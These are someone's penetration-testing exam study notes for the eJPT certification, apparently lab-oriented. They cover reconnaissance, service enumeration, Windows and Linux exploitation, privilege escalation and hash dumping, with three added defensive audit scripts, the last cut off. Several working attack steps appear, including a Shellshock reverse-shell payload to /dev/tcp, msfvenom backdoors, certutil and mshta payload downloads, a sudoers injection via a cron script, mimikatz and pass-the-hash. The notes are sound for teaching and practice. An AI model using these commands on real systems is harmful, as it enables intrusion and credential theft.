E JPT v2 Notes by Hamid TCM Security

lOMoARcPSD|51490668


Engineering Sciences (Institut des Sciences et Technologies de Paris)



Downloaded by Wokwok (werkingpcrequest@gmail.com)

eJPT V2: notes
JR PENTESTER

By Elmarrouni Hamid


eJPT V2:
Table of contents
1. Information gathering:
   a. passive:
   b. active:
2. Footprinting & scanning:
   a. SMB:
   b. Samba:
   c. FTP:
   d. SSH:
   e. HTTP:
      iis:
      apache:
   f. mysql:
3. Vulnerability Assessment:
4. System/Host Based Attacks windows:
   a. IIS-webdav:
   b. SMB:
   c. RDP:
   d. WinRM:
   e. UAC Bypass:
   f. Privilege escalation: impersonate
   g. Privilege escalation: Powersploit - unattend:
   h. Privilege escalation: method 2 - unattend
   i. Dump hashes with mimikatz & kiwi:
   j. Pass-the-hash:
5. System/Host Based Attacks linux:
   a. Shellshock CVE 2014-6271:
   b. Ssh
   c. ftp:
   d. Samba:
   e. Linux kernel exploitation:
   f. Cron jobs:
   g. Exploitation of SUID binaries:
   h. Dump hash:
6. Network Based Attacks:
   a. DNS:
   b. wireshark:
   c. ARP poisoning:
      Dsniff tools:
   d. tshark:
7. metasploit:
   a. pivoting:
   b. apache:
   c. mysql:
   d. smtp:
   e. WMAP:
   f. msfvenom:
   g. Automating Metasploit:
   h. Apache Tomcat:
   i. FTP:
   j. meterpreter:
   k. windows post exploitation:
      bypass UAC:
      impersonate:
      psexec:
      persistence:
      enable_rdp:
      keylogging:
      clearing event logs:
      pivoting:
   l. linux post exploitation:
      rootkit:
      persistence:
8. exploitation:
   a. banner grabbing:
   b. searchsploit:
   c. using exploits manually:
   d. netcat:
   e. black box exploitation:
9. Post exploitation:
   1. Windows Local Enumeration:
   2. linux Local Enumeration:
   3. Transferring Files To Windows & Linux Targets:
   4. Windows Privilege Escalation:
   5. linux Privilege Escalation:
   6. Windows Persistence:
   7. linux Persistence:
   8. Dumping & Cracking Windows Hashes:
   9. Dumping & Cracking linux Hashes:
   10. pivoting:
   11. clean tracks:
10. web exploitation:
   a. cross site scripting (xss):
      Reflected attacks:
      Persistent XSS attacks
      Cookie Stealing via XSS:
   b. sql injection:
   c. ZAProxy:
   d. nikto:
   e. sqlmap:
   f. XSSer:

1. Information gathering:
a. passive:
- WHOIS
- robots.txt "a file present on most websites"
- sitemap.xml "like robots.txt"
- Wappalyzer "a browser extension that identifies the technologies a website uses"
- whatweb
- HTTrack (webhttrack in Kali)
- netcraft "a website"
- dnsrecon -d <domain>
- dnsdumpster "a site for information gathering"
- wafw00f <site web> # a Kali Linux tool to identify web application firewalls
- sublist3r -d <domain> -e <search engines>
- google dorks: <word> site:<url>
  <word> intitle:<title>
  inurl:<word> intitle:<word>
  site:*.<domain> filetype:<extension>
  cache:<domain>
- waybackmachine
- theHarvester "searches for email addresses"
- haveibeenpwned.com

b. active:
- dns zone transfers
- dnsenum
- nmap


2. Footprinting & scanning:

- arp-scan, wireshark, nmap


a. SMB:
We have discovered that multiple ports are open. SMB port 445 is also exposed. We will run the Nmap
script that lists the supported protocols and dialects of an SMB server:
nmap -p445 --script smb-protocols <ip>
Running security mode script to return the information about the SMB security level:
nmap -p445 --script smb-security-mode <ip>
We have the SMB server credentials, i.e. <x>:<x>. We will use them with an Nmap script to scan the target
and discover sensitive information:
nmap -p445 --script smb-enum-sessions <ip>
nmap -p445 --script smb-enum-sessions --script-args smbusername=<x>,smbpassword=<x> <ip>

Enumerating all available shares :


nmap -p445 --script smb-enum-shares <ip>
nmap -p445 --script smb-enum-shares --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerate the windows users on a target machine:
nmap -p445 --script smb-enum-users --script-args smbusername=<x>,smbpassword=<x> <ip>
Get information about the server statistics. It uses port 445 and port 139 to fetch the details:
nmap -p445 --script smb-server-stats --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating available domains on a target machine :
nmap -p445 --script smb-enum-domains --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating available user groups on a target machine:
nmap -p445 --script smb-enum-groups --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating services on a target machine:
nmap -p445 --script smb-enum-services --script-args smbusername=<x>,smbpassword=<x> <ip>
Enumerating all shared folders and drives, then running ls (list files or directories, like dir on Windows)
on every share:
nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=<x>,smbpassword=<x> <ip>
Running the smbmap tool to discover all shared folders and drives. We will find all the shared folders using
a guest user account:
smbmap -u <user> -p "<password>" -d . -H <ip>
smbmap -H <ip> -u <user> -p <password> -x '<command>'
Listing all drives on the specified host:
smbmap -H <ip> -u <user> -p <password> -L
List the contents of the C:\ drive:
smbmap -H <ip> -u <user> -p <password> -r 'C$'


Uploading a sample file:
smbmap -H <ip> -u <user> -p <password> --upload '/root/backdoor' 'C$\backdoor'
Downloading a file:
smbmap -H <ip> -u <user> -p <password> --download '<path>'

b. Samba:
Find the exact version of samba server by using appropriate nmap script:
nmap --script smb-os-discovery.nse -p 445 <ip>
Find the exact version of samba server by using smb_version metasploit module:
msfconsole
use auxiliary/scanner/smb/smb_version
set RHOSTS <ip>
exploit
What is the NetBIOS computer name of samba server? Use appropriate nmap scripts :
nmap --script smb-os-discovery.nse -p 445 <ip>
Find the NetBIOS computer name of samba server using nmblookup:
nmblookup -A <ip>
Using smbclient determine whether anonymous connection (null session) is allowed on the samba
server or not:
smbclient -L <ip> -N
Using rpcclient determine whether anonymous connection (null session) is allowed on the samba server
or not:
rpcclient -U "" -N <ip>
Find the OS version of samba server using rpcclient:
rpcclient -U "" -N <ip>
Find the OS version of samba server using enum4Linux:
enum4linux -o <ip>
Find the server description of samba server using smbclient:
smbclient -L <ip> -N
Is the NT LM 0.12 (SMBv1) dialect supported by the samba server? Use the appropriate nmap script:
nmap -p445 --script smb-protocols <ip>
Is SMB2 protocol supported by the samba server? Use smb2 metasploit module:
msfconsole
use auxiliary/scanner/smb/smb2
set RHOSTS <ip>


exploit
List all users that exist on the samba server using the appropriate nmap script:
nmap --script smb-enum-users.nse -p445 <ip>
List all users that exist on the samba server using the smb_enumusers metasploit module:
msfconsole
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <ip>
exploit
List all users that exist on the samba server using enum4Linux:
enum4linux -U <ip>
List all users that exist on the samba server using rpcclient:
rpcclient -U "" -N <ip>
enumdomusers
Find the SID of user "admin" using rpcclient:
rpcclient -U "" -N <ip>
lookupnames admin
List all available shares on the samba server using the smb_enumshares metasploit module:
msfconsole
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS <ip>
exploit
List all available shares on the samba server using enum4Linux:
enum4linux -S <ip>
List all available shares on the samba server using smbclient:
smbclient -L <ip>
Find the domain groups that exist on the samba server using enum4Linux:
enum4linux -G <ip>
Find the domain groups that exist on the samba server using rpcclient:
rpcclient -U "" -N <ip>
enumdomgroups
Is the samba server configured for printing?:
enum4linux -i <ip>
How many directories are present inside share “public”?:


smbclient //<ip>/public -N
ls
Which share is read only?:
smbmap -H <ip> -u <user> -p <password>
List the named pipes available over SMB on the samba server:
msfconsole
use auxiliary/scanner/smb/pipe_auditor

c. FTP:
Check whether anonymous login is allowed on the ftp server using nmap script:
nmap --script ftp-anon <ip>

d. SSH:
Fetch the banner using netcat and check the version of SSH server:
nc <ip> 22
How many “encryption_algorithms” are supported by the SSH server:
nmap --script ssh2-enum-algos <ip>
What is the ssh-rsa host key being used by the SSH server:
nmap --script ssh-hostkey --script-args ssh_hostkey=full <ip>
Which authentication methods does the SSH server offer for a given user:
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=<user>" <ip>
Find the password of user "administrator" using the appropriate nmap script:
echo "administrator" > users
nmap -p 22 --script ssh-brute --script-args userdb=/root/users <ip>
Find the password of user "root" using the ssh_login metasploit module with the userpass dictionary
/usr/share/wordlists/metasploit/root_userpass.txt:
msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.40.231.3
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit
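Two of the questions above (is the SMBv1 "NT LM 0.12" dialect offered by the SMB server; how many encryption algorithms does the SSH server support) are answered by reading the output of the smb-protocols and ssh2-enum-algos scripts. As an added example that is not part of the original notes, the Python below parses nmap's XML output (-oX) for those two scripts and flags SMBv1 support and weak SSH ciphers; the XML document and the WEAK_SSH_CIPHERS denylist are constructed assumptions, not real scan data.

```python
"""Triage nmap -oX output for SMBv1 dialect support (smb-protocols) and
weak SSH ciphers (ssh2-enum-algos). All sample data below is constructed."""
import xml.etree.ElementTree as ET

# Constructed sample of nmap XML output for one host scanned with
# `nmap -p22,445 --script smb-protocols,ssh2-enum-algos <ip>` (assumption).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <script id="ssh2-enum-algos" output="...">
          <table key="kex_algorithms">
            <elem>curve25519-sha256</elem>
            <elem>diffie-hellman-group1-sha1</elem>
          </table>
          <table key="encryption_algorithms">
            <elem>aes256-ctr</elem>
            <elem>aes128-ctr</elem>
            <elem>3des-cbc</elem>
            <elem>arcfour</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <script id="smb-protocols" output="...">
          <table key="dialects">
            <elem>NT LM 0.12 (SMBv1) [dangerous, but default]</elem>
            <elem>2.0.2</elem>
            <elem>2.1</elem>
            <elem>3.0</elem>
          </table>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Ciphers a reviewer would flag as obsolete (assumption: a minimal denylist).
WEAK_SSH_CIPHERS = {"arcfour", "arcfour128", "arcfour256", "3des-cbc",
                    "blowfish-cbc", "cast128-cbc"}


def _table(script, key):
    """Return the <elem> texts of the <table key=...> child of a <script>."""
    table = script.find(f"table[@key='{key}']")
    if table is None:
        return []
    return [(e.text or "").strip() for e in table.findall("elem")]


def triage(xml_text):
    """Parse nmap XML and return {addr: findings} for SMB dialects and SSH ciphers."""
    root = ET.fromstring(xml_text)
    findings = {}
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        info = {"smb_dialects": [], "smbv1": False,
                "ssh_ciphers": [], "weak_ssh_ciphers": []}
        for script in host.iter("script"):
            if script.get("id") == "smb-protocols":
                info["smb_dialects"] = _table(script, "dialects")
                # nmap labels the SMBv1 dialect "NT LM 0.12 (SMBv1) ..."
                info["smbv1"] = any(d.startswith("NT LM 0.12")
                                    for d in info["smb_dialects"])
            elif script.get("id") == "ssh2-enum-algos":
                info["ssh_ciphers"] = _table(script, "encryption_algorithms")
                info["weak_ssh_ciphers"] = [c for c in info["ssh_ciphers"]
                                            if c in WEAK_SSH_CIPHERS]
        findings[addr] = info
    return findings


if __name__ == "__main__":
    for addr, info in triage(SAMPLE_NMAP_XML).items():
        print(f"{addr}: SMBv1={info['smbv1']} "
              f"ssh_ciphers={len(info['ssh_ciphers'])} "
              f"weak={info['weak_ssh_ciphers']}")
```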

e. HTTP:
iis:


Running the whatweb tool to find all possible information about the target server:
whatweb <ip>
Using the httpie tool to gather target server information:
http <ip>
Running the dirb tool on the target server port 80 to discover the web server’s directories and
subdirectories:
dirb http://<ip>
We have found all the basic details about the target server without using the browser. We could also
use browsh “A fully-modern text-based browser, rendering to TTY and browsers”:
browsh --startup-url http://<ip>/Default.aspx
Running http-enum nmap script to discover interesting directories:
nmap --script http-enum -sV -p 80 <ip>
Running Header script to get the IIS server header information:
nmap --script http-headers -sV -p 80 <ip>
Running http-methods script on /webdav path to discover all allowed methods:
nmap --script http-methods --script-args http-methods.url-path=/webdav/ <ip>
Running the http-webdav-scan Nmap script to identify WebDAV installations; the script uses the OPTIONS and
PROPFIND methods to detect them:
nmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/ <ip>

apache:
Which web server software is running on the target server, and what version? Find out using nmap:
nmap -sV --script banner <ip>
Which web server software is running on the target server and also find out the version using suitable
metasploit module:
msfconsole
use auxiliary/scanner/http/http_version
Check what web app is hosted on the web server using curl command:
curl http://<ip>/
Check what web app is hosted on the web server using the browsh CLI based browser:
browsh --startup-url http://<ip>
Check what web app is hosted on the web server using lynx CLI based browser:


lynx http://<ip>
Perform brute force on web server directories and list the names of the directories found. Use the brute_dirs
metasploit module:
use auxiliary/scanner/http/brute_dirs
Use the directory buster (dirb) tool with the /usr/share/metasploit-framework/data/wordlists/directory.txt
dictionary to check whether any directory is present in the root folder of the web server. List the names of
the directories found:
dirb http://192.30.247.3 /usr/share/metasploit-framework/data/wordlists/directory.txt
Which bot is specifically banned from accessing a specific directory?:
use auxiliary/scanner/http/robots_txt


f. mysql:
What command is used to connect to remote MySQL database:
mysql -h <ip> -u root
How many databases are present on the database server?:
show databases;
How many records are present in table "authors"? This table is inside the "books" database:
use books;
select count(*) from authors;
Dump the schema of all databases from the server using suitable metasploit module?:
msfconsole
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS <ip>
set USERNAME root
set PASSWORD ""
exploit
How many of the directories listed in /usr/share/metasploit-framework/data/wordlists/directory.txt
are writable? List their names:
use auxiliary/scanner/mysql/mysql_writable_dirs
set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
set RHOSTS <ip>
set VERBOSE false
set PASSWORD ""
exploit
How many of the sensitive files listed in /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
are readable? List their names:
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS <ip>
set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
set PASSWORD ""
exploit
Find the system password hash for user "root":
select load_file("/etc/shadow");
How many database users are present on the database server? List their names and password hashes:


use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS <ip>
set USERNAME root
set PASSWORD ""
Check whether anonymous login is allowed on MySQL Server:
nmap --script=mysql-empty-password -p 3306 <ip>
Check whether “InteractiveClient” capability is supported on the MySQL server:
nmap --script=mysql-info -p 3306 <ip>
Enumerate the users present on MySQL database server using mysql-users nmap script:
nmap --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" -p 3306 <ip>
List all databases stored on the MySQL Server using nmap script:
nmap --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" -p 3306 <ip>
Find the data directory used by mysql server using nmap script:
nmap --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" -p 3306 <ip>

Check whether File Privileges can be granted to non admin users using mysql-audit nmap script:
nmap --script=mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" -p 3306 <ip>
Dump all user hashes using nmap script:
nmap --script mysql-dump-hashes --script-args="username='root',password=''" -p 3306 <ip>
Find the number of records stored in table “authors” in database “books” stored on MySQL Server using
mysql-query nmap script:
nmap --script=mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''" -p 3306 <ip>
Identifying valid MSSQL users and their passwords using provided username and password list:
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 10.6.24.17
Extracting sysusers from MSSQL and storing the output in a file i.e output.txt:
nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" 10.6.24.17 -oN output.txt
Dump the hashes of MSSQL users:
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria 10.6.24.17


Execute a command through xp_cmdshell using an Nmap script:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" 10.6.24.17
Reading the flag using xp_cmdshell:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" <ip>
Running the MSSQL enumeration module to find all possible information:
use auxiliary/admin/mssql/mssql_enum
set RHOSTS <ip>
exploit
Extract all MSSQL users :
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS <ip>
exploit
Execute a command using mssql_exec module:
use auxiliary/admin/mssql/mssql_exec
set RHOSTS 10.0.20.101
set CMD whoami
exploit
Running MSSQL enum domain accounts module. This module dumps the information such as Windows
domain users, groups, and computer accounts:
use auxiliary/admin/mssql/mssql_enum_domain_accounts

3. Vulnerability Assessment:
- Nessus
- OpenVAS


4. System/Host Based Attacks windows:


a. IIS-webdav:
Running the davtest tool:
davtest -auth <user>:<password> -url http://<ip>/webdav
Upload an .asp backdoor to the /webdav directory on the target machine using the cadaver utility:
cadaver http://<ip>/webdav
put /usr/share/webshells/asp/webshell.asp
http://<ip>/webdav/webshell.asp
Run the metasploit framework and exploit the target using the IIS webdav exploit module:
use exploit/windows/iis/iis_webdav_upload_asp
set PATH /webdav/metasploit%RAND%.asp

b. SMB:
Running the psexec module to gain a meterpreter shell:
use exploit/windows/smb/psexec
set RHOSTS <ip>
set SMBUser <user>
set SMBPass <pass>

c. RDP:
RDP (Remote Desktop Protocol) uses port 3389 by default, but we have not discovered that port. We can
notice that port 3333 is exposed. We can identify RDP endpoints with an auxiliary module to check whether
port 3333 is running RDP:
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip>
set RPORT 3333
Running the hydra tool to find valid usernames and passwords from the provided lists:
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://<ip> -s 3333
We have discovered four valid users and passwords. Access the remote server using the xfreerdp tool:
xfreerdp /u:<user> /p:<password> /v:<ip>

d. WinRM:
WinRM typically uses ports 5985 and 5986.
Checking the authentication methods supported by WinRM using an auxiliary module:
use auxiliary/scanner/winrm/winrm_auth_methods
Execute a command on the target server using the winrm_cmd module:
use auxiliary/scanner/winrm/winrm_cmd


set CMD whoami
Use the winrm_script_exec exploit module to get a meterpreter shell:
use exploit/windows/winrm/winrm_script_exec
set RHOSTS <ip>
set USERNAME <user>
set PASSWORD <password>
set FORCE_VBS true


e. UAC Bypass:
Checking the current user:
getuid
sysinfo
We can observe that we are running as an admin user. Migrate into the explorer.exe process: first search
for the PID of explorer.exe, then use the migrate command to move the current session into that
process:
ps -S explorer.exe
migrate <pid>
Elevate to high privilege:
getsystem
Get a Windows shell and check whether the admin user is a member of the Administrators group:
shell
net localgroup administrators
Generating a malicious executable using msfvenom and running it on the target machine to gain
administrator privileges:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe > backdoor.exe
file backdoor.exe
Switch to the user's temp folder and upload the Akagi64.exe and backdoor.exe
executables:
CTRL + C
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls
Start another msfconsole and run a multi handler:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 4444
Switch back to the meterpreter session and run the Akagi64.exe executable:
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
Dump the hashes:
hashdump


f. Privilege escalation : impersonate


We cannot read the flag with the current privileges. The flag is located in the Administrator's Desktop
folder. Load the incognito plugin and check all available tokens:
load incognito
list_tokens -u
We can notice that the Administrator user token is available. Impersonate the Administrator user token
and read the flag:
impersonate_token ATTACKDEFENSE\\Administrator
getuid


g. Privilege escalation : Powersploit - unattend :


Source: https://github.com/PowerShellMafia/PowerSploit
PowerSploit: "PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid
penetration testers during all phases of an assessment. PowerSploit is comprised of the following
modules and scripts:"
PowerUp.ps1: "PowerUp aims to be a clearinghouse of common Windows privilege escalation
vectors that rely on misconfigurations."
We run the PowerUp.ps1 PowerShell script to look for privilege escalation vulnerabilities:
powershell.exe
cd .\Desktop\PowerSploit\Privesc\
ls
Import the PowerUp.ps1 script and run the Invoke-PrivescAudit function (-ep bypass skips the
PowerShell execution policy):
powershell -ep bypass
. .\PowerUp.ps1
Invoke-PrivescAudit
Read the Unattend.xml file:
cat C:\Windows\Panther\Unattend.xml
Decode the administrator password using PowerShell:
$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password))
echo $password
Run a command prompt as the administrator user with the discovered credentials:
runas.exe /user:<user> cmd
<password>
whoami
Run the hta_server module to get a meterpreter shell. Start msfconsole:
msfconsole -q
use exploit/windows/misc/hta_server
exploit
To get the meterpreter shell, run the HTA from the target (use your own Metasploit HTA server link):
mshta.exe http://<ip>:8080/<link>.hta
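An added defensive check, not from the original notes or from PowerSploit: a Python script that looks for leftover answer files in the usual Unattend.xml locations and reports any password element still holding a value, decoding it the same way the PowerShell above does. The candidate paths and the sample XML are constructed for illustration.

```python
import base64
import os
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"

# Usual places a leftover installation answer file is found (constructed list, extend as needed).
UNATTEND_CANDIDATES = [
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\System32\Sysprep\Unattend.xml",
    r"C:\unattend.xml",
]


def encode_unattend_value(password: str, element: str) -> str:
    """How Windows stores a non-PlainText value: base64(UTF-16LE(password + element name))."""
    return base64.b64encode((password + element).encode("utf-16-le")).decode("ascii")


def decode_password_value(value: str, element: str) -> str:
    """Recover the cleartext from a <Value> whose <PlainText> is false.

    The Windows layout is UTF-16LE with the element name appended; some lab images
    (as in the notes above) simply base64 the UTF-8 password, so fall back to that.
    """
    raw = base64.b64decode(value)
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):   # every high byte zero: ASCII in UTF-16LE
        text = raw.decode("utf-16-le")
        return text[: -len(element)] if text.endswith(element) else text
    return raw.decode("utf-8", errors="replace")


def find_passwords(xml_text: str) -> list:
    """Return (element, cleartext) for every password still present in an answer file."""
    root = ET.fromstring(xml_text)
    found = []
    for tag in ("Password", "AdministratorPassword"):
        for elem in root.iter(f"{{{NS}}}{tag}"):
            value_el = elem.find(f"{{{NS}}}Value")
            plain_el = elem.find(f"{{{NS}}}PlainText")
            value = (value_el.text or "").strip() if value_el is not None else ""
            if not value or value == "*SENSITIVE*DATA*DELETED*":   # empty or already sanitised
                continue
            is_plain = plain_el is not None and (plain_el.text or "").strip().lower() == "true"
            found.append((tag, value if is_plain else decode_password_value(value, tag)))
    return found


def audit_paths(paths) -> dict:
    """Scan each existing path; map it to the passwords found there."""
    results = {}
    for path in paths:
        if os.path.isfile(path):
            with open(path, encoding="utf-8-sig") as fh:
                results[path] = find_passwords(fh.read())
    return results


# Constructed sample: an AutoLogon password left encoded, and an administrator password already wiped.
SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="{NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Password>
          <Value>{encode_unattend_value("Passw0rd!", "Password")}</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>*SENSITIVE*DATA*DELETED*</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    print(find_passwords(SAMPLE_UNATTEND))                      # [('Password', 'Passw0rd!')]
    print(decode_password_value("QWRtaW5AMTIz", "Password"))    # the value from the notes: Admin@123
    for path, hits in audit_paths(UNATTEND_CANDIDATES).items():
        print(path, hits)
```

A file that still yields a cleartext here should be deleted or have its password elements replaced by the *SENSITIVE*DATA*DELETED* marker that sysprep writes.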


h. Privilege escalation : method 2- unattend


Create the payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<lport> -f exe > payload.exe
Serve it over HTTP on port 80:
python -m SimpleHTTPServer 80
Download the payload from the target machine:
certutil -urlcache -f http://<kali_machine>/payload.exe payload.exe
Run the multi handler in Metasploit to listen for the connection:
use exploit/multi/handler
set lport <port>
set lhost <ip>
set payload windows/meterpreter/reverse_tcp
run
Search for the unattend file from meterpreter (or search manually):
search -f unattend.xml
cat unattend.xml
Save the encoded password to a text file and decode it:
base64 -d password.txt
psexec.py Administrator@<ip>

i. Dump hashes with mimikatz & kiwi :


Mimikatz:
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
.\mimikatz.exe
Check the required privilege:
privilege::debug
Dump the hashes:
lsadump::sam
lsadump::secrets
Kiwi: type this command in meterpreter, then "?" to show the options:
load kiwi


j. Pass-the-hash:
service postgresql start
migrate -N lsass.exe
hashdump
Get the NTLM hashes, then:
use exploit/windows/smb/psexec
set lport 4422
set rhosts <ip>
set smbuser administrator
set smbpass <lm_hash>:<ntlm_hash>
set target "Native upload"

Another way:
crackmapexec smb <ip> -u administrator -H <ntlm_hash> -x <command>


5. System/Host Based Attacks linux:


a. Shellshock CVE-2014-6271:
Check whether the Shellshock vulnerability exists:
nmap --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <ip>
Using Burp Suite and Firefox with FoxyProxy, send the request to Repeater and change the User-Agent
value to this:
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
On the Kali machine: nc -nvlp 1234
In the same place in Burp:
() { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'

b. SSH
Brute force with hydra:
hydra -L <user_file> -P <pass_file> -t 4 <ip> ssh
After gaining initial access on Linux:
Linux distribution version:
cat /etc/*issue
Linux kernel version:
uname -r
libssh versions 0.6.0 to 0.8.0 are vulnerable to an authentication bypass:
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true

c. FTP:
Find the password of user "sysadmin" using an nmap script:
echo "sysadmin" > users
nmap --script ftp-brute --script-args userdb=/root/users -p 21 <ip>
ftp <ip>
Command to download a file from the FTP server: get

d. Samba:
After getting the password by brute force, gather more information about the target machine:
smbmap -H <host> -u <user> -p <password>
smbclient //<ip>/usershare -U admin
enum4linux -a -u <user> -p <password>
Or use this module if the Samba version is vulnerable:


use exploit/linux/samba/is_known_pipename

e. Linux kernel exploitation :


Linux-Exploit-Suggester: this tool is designed to assist in detecting security deficiencies for a
given Linux kernel/Linux-based machine. It assesses (using heuristic methods) the exposure of the
given kernel to every publicly known Linux kernel exploit.
GitHub: https://github.com/The-Z-Labs/linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

After initial exploitation (a meterpreter session without elevated permissions):

Type shell, then type /bin/bash -i
groups <service-account>
Go back to the meterpreter session, change to the /tmp directory, then type this command:
upload <path of tool les.sh>
Open the shell session again:
chmod +x les.sh
Execute les.sh; it reports information about the kernel and, if the kernel is vulnerable, a link to
exploit code. The code is mostly written in C, in which case we follow these steps:
- Install gcc to compile the C code and rename the source file: mv <old_name.c> <new_name.c>,
following the steps written in the code comments
- Upload the code in the meterpreter session, open a shell session and make it executable:
chmod +x <name>
- Then follow the steps written in the code comments

f. Cron jobs :
Cron is a life saver for admins when it comes to doing periodic maintenance tasks on the
system. It can even be used in cases where tasks are performed within individual user
directories. However, such automation needs to be used with caution or it can lead to easy privilege
escalation attacks.
- Cron jobs can also be run as any user on the system; this is a very important factor to keep an eye
on, as we will be targeting cron jobs that have been configured to run as the "root" user.
- This is primarily because any script or command run by such a cron job runs as the root user
and consequently provides us with root access. In order to elevate our privileges, we need to
find and identify cron jobs scheduled by the root user, or the files being processed by the cron job.

After gaining access as a user without root privileges, we follow this method:
First, search for temporary files whose creation time keeps changing:
ls -l (to see the creation time and permissions)


Find out how this temporary file is produced by searching for its path in the system directories:
grep -nri "<path_of_file>" /<bin, root, etc, usr ...>
If we find the original bash script and we have permission to edit it, we add this
command to let the normal user escalate privileges without a password:
printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > <path_of_bash_script>
The /etc/sudoers file is what is used to determine whether a user has sudo permission.

We can use this command to show the cron jobs of the current user:
crontab -l
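An added defensive audit, not from the original notes: it parses /etc/crontab-style entries, keeps the jobs that run as root and flags the misconfiguration described above, a referenced script that other users can write or replace (or that does not exist yet). The crontab text and the scripts it checks are constructed in a temporary directory.

```python
import os
import shlex
import stat
import tempfile


def parse_system_crontab(text: str) -> list:
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d lines (7-field format with a user column)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:          # SHELL=/bin/sh, PATH=... assignments
            continue
        if line.startswith("@"):            # @reboot, @daily, ...: special string, user, command
            fields = line.split(None, 2)
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
            continue
        fields = line.split(None, 6)        # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def referenced_paths(command: str) -> list:
    """Absolute paths named on the command line: the script itself or an interpreter argument."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def check_path(path: str) -> list:
    """Ways a lower-privileged user could change what root ends up executing."""
    problems = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing file: whoever can create it controls what root runs"]
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable file executed as root")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        problems.append("parent directory world-writable without sticky bit: file can be replaced")
    return problems


def audit_crontab(text: str) -> list:
    """Findings as (path, problem) for every job scheduled to run as root."""
    findings = []
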